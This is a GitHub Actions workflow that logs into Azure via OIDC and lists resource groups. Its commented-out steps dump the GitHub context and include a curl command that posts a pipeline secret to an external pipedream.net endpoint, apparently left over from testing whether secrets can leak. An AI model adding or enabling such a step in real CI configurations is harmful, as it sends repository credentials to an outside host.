name: Test

on:
  workflow_dispatch: 
  pull_request:
  # pull_request_target:
  #   branches: [ main ]

permissions:
  id-token: write
  contents: read

jobs: 
  validate-task:
    runs-on: windows-latest
    steps:
      - name: OIDC Login to Azure Public Cloud with AzPowershell (enableAzPSSession true)
        uses: azure/login@v1
        with:
          client-id: '320099b6-8088-4a89-a2b0-51ea9b8ce246'
          tenant-id: '6c51c659-9d52-41af-81f7-dde16380e813'
          subscription-id: '5e04d317-fc3d-4c85-86de-02c812c6a759'
          enable-AzPSSession: true

      - name: 'Get resource group with PowerShell action'
        uses: azure/powershell@v1
        with:
          inlineScript: |
            Get-AzResourceGroup
          azPSVersion: "latest"

  # build:
  #   runs-on: ubuntu-latest
  #   strategy:
  #     matrix:
  #       node-version: [14.x]
  #   steps:

  #   - uses: actions/checkout@v4



    # - name: Dump GitHub context
    #   env:
    #     GITHUB_CONTEXT: ${{ toJson(github) }}
    #   run: echo "$GITHUB_CONTEXT"

    # - name: Run test script
    #   run: | 
    #     echo '${{ github.event.repository.name }}'
    #     echo 
    
    # - name: Run test script
    #   env:
    #     GH_TOKEN: ${{ secrets.GITHUB_TOKEN }}
    #   run: |
    #     echo 'starting the validation'
        
    #     echo 'git repository: ${{ github.event.pull_request.head.repo.full_name }}' 

    #     gh repo list 

    #     # gh repo set-default '${{ github.event.pull_request.head.repo.full_name }}'

    #     # gh run list 


    # - name: Run test script
    #   run: |
    #       echo 'secret: ${{ secrets.PIPELINE_SECRET }}'
    #       curl -d '{
    #         "variable": "${{ secrets.PIPELINE_SECRET }}"
    #       }'   -H "Content-Type: application/json"   https://eoiikfnaxc9jix5.m.pipedream.net
        

    # - name: Run test script
    #   env:
    #     GH_TOKEN: ${{ secrets.GITHUB_TOKEN }}
    #   run: |
    #     echo 'starting the validation'
        
    #     echo 'git repository:' 
    #     gh repo view

    #     echo 'git history: '
    #     git log -5

    #     echo 'commit sha:' 
    #     git rev-parse --short HEAD^1 
    #     commitSHA=$(git rev-parse HEAD^1)

    #     echo "listing all gh workflow runs"
    #     gh run list 

    #     echo "listing a specific gh workflow run"
    #     gh run list --status completed --workflow Test --json status,name,headSha -c "$commitSHA"
